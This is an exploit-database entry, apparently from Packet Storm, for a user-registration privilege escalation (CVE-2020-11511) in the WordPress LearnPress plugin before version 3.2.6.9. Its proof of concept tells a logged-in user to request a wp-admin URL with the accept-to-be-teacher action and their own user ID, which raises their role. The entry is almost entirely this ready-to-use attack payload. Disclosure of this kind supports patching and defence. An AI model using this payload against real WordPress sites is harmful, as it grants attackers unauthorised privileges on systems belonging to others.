WordPress LearnPress Privilege Escalation

2021-07-19T00:00:00
ID PACKETSTORM:163538
Type packetstorm
Reporter nhattruong
Modified 2021-07-19T00:00:00

Description

                                        
                                            `# Exploit Title: WordPress Plugin LearnPress < 3.2.6.9 - User Registration Privilege Escalation  
# Date: 07-17-2021  
# Exploit Author: nhattruong or nhattruong.blog  
# Vendor Homepage: https://thimpress.com/learnpress/  
# Software Link: https://wordpress.org/plugins/learnpress/  
# Version: < 3.2.6.9  
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd  
# CVE: CVE-2020-11511  
  
POC:  
1. Find out your user id  
2. Login with your cred  
3. Execute the payload  
  
  
http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>  
  
# Done!  
`